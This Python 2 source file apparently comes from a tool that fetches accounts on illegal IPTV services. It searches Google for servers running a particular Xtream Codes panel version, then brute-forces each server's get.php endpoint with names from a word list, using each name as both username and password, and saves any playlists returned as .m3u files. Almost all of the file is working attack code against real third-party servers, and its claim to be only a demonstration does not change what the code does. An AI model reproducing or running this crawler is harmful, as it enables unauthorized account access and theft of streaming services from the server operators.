import urllib2
import google
import time
import pyprind
import os
import random
from urlparse import urlparse

"""Crawler
Class that handles the crawling process and fetches accounts on illegal IPTV services

Authors:
Claudio Ludovico (@Ludo237)
Pinperepette (@Pinperepette)
Arm4x (@Arm4x)
"""
class Crawler(object):
    # version
    version = "1.2.3"
    # output default directory
    outputDir = "output"
    # language default directory
    languageDir = "languages"
    # query string appended to a site's URL, filling in a username and password to try
    basicString = "/get.php?username=%s&password=%s&type=m3u&output=mpegts"
    # search query used to find sites running the vulnerable CMS version
    searchString = "Xtream Codes v1.0.59.5"

    def __init__(self, language = "it"):
        """Default constructor

        Keyword arguments:
        language -- language of the names file we use for the brute force. (default it)
        """
        self.language = language.lower()
        self.parsedUrls = []      # base URLs collected by search_links
        self.foundedAccounts = 0  # counter of the accounts found so far

    def change_language(self, language = "it"):
        """Set the language you want to use to brute force names

        Keyword arguments:
        language -- language of the names file we use for the brute force. (default it)

        Return:
        boolean -- true if the language file exists, otherwise false
        """
        language = language.lower()
        if os.path.isfile(self.languageDir + "/" + language + ".txt"):
            self.language = language
            return True
        else:
            return False

    def search_links(self):
        """Print the first 30 links from a Web search

        We set the limit of 30 links because this script serve as demonstration and it's
        not intended to be use for personal purpose.
        """
        # stop=30 makes the generator yield the full 30 results promised above
        for url in google.search(self.searchString, num=30, stop=30):
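            # Keep only scheme and host (e.g. "http://example.com") so the
            # exploit path can be appended later by search_accounts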
            parsed = urlparse(url)
            self.parsedUrls.append(parsed.scheme + "://" + parsed.netloc)

    def search_accounts(self, url = None):
        """Search Accounts
        This is the core method. It will crawl the given URL for any possible accounts.
        If we find any, we create a new directory under /output named after the site
        and save every account as a .m3u file. Please use VLC to open that
        kind of file

        Keyword arguments:
        url -- a URL from the fetched list. (default None)

        Return:
        string -- the status of the crawling session
        """
        if not self.parsedUrls:
            return "You must fetch some URLs first"
        try:
            if not url:
                url = random.choice(self.parsedUrls)
            fileName = self.languageDir + "/" + self.language + ".txt"
            fileLength = self.file_length(fileName)
            progressBar = pyprind.ProgBar(fileLength, title = "Fetching accounts from " + url + ", this might take a while.", stream = 1, monitor = True)
            # Reset the counter so the report below refers to this URL only
            self.foundedAccounts = 0
            with open(fileName) as f:
                rows = f.readlines()
            for row in rows:
                # Do the injection to the current url using the exploit that we know
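                # e.g. http://example.com/get.php?username=mario&password=mario&type=m3u&output=mpegts
                # (the same word from the names file is tried as both username and password)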
                opener = urllib2.build_opener()
                opener.addheaders = [('User-agent', 'Mozilla/5.0')]
                response = opener.open(url + self.basicString % (row.strip(), row.strip()))
                fetched = response.read()
                # Update the progress bar in order to give the user a nice
                # indication of the time left
                fileLength = fileLength - 1
                progressBar.update()
                # IF the fetched content is not empty
                # we build the dedicated .m3u file
                if len(fetched) > 0:
                    # Use only the host name so https:// URLs do not leak "://" into the path
                    newPath = self.outputDir + "/" + urlparse(url).netloc
                    self.create_file(row, newPath, fetched)
            # Remove the URL we just used so we do not parse it again
            self.parsedUrls.remove(url)
            if self.foundedAccounts != 0:
                return "Search done, account founded on " + url + ": " + str(self.foundedAccounts)
            else:
                return "No results for " + url
        except IOError:
            return "Cannot open the current language file. Try another one"
        except urllib2.HTTPError as e:
            return "Oops, HTTP error here. Cannot fetch the current URL: " + str(e.code)
        except urllib2.URLError as e:
            return "Oops, the URL seems broken: " + str(e.reason)
        except Exception:
            return "Oops, something went wrong!"

    def create_file(self, row, newPath, fetched):
        """Create File
        Once the parser finds something worthwhile, we need to create the .m3u file.
        To do so we expect a newPath, the current row used from the names file and
        the content of the fetched response

        Keyword arguments:
        row -- row of the language file; this lets us know which names
        were useful for the brute force.

        newPath -- the path that we use to store the currently fetched accounts.

        fetched -- the body of the response fetched by the attack.
        """
        if not os.path.exists(newPath):
            os.makedirs(newPath)
        # The context manager closes the file even if the write fails
        with open(newPath + "/tv_channels_%s.m3u" % row.strip(), "w") as outputFile:
            outputFile.write(fetched)
        self.foundedAccounts = self.foundedAccounts + 1

    def file_length(self, fileName):
        """File Length
        Cheapest way to count the lines of a file

        Keyword arguments:
        fileName -- name of the file whose line count we want
        """
        # Start at -1 so an empty file correctly reports zero lines
        i = -1
        with open(fileName) as f:
            for i, l in enumerate(f):
                pass
        return i + 1
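
# Minimal usage sketch (an assumption about how the class is meant to be driven,
# not part of the original module): fetch candidate URLs for the vulnerable CMS,
# then crawl one of them. It requires the `google` and `pyprind` packages and a
# languages/it.txt word list next to this script.
if __name__ == "__main__":
    crawler = Crawler(language = "it")
    crawler.search_links()
    if crawler.parsedUrls:
        print crawler.search_accounts()
    else:
        print "No URLs found for " + Crawler.searchString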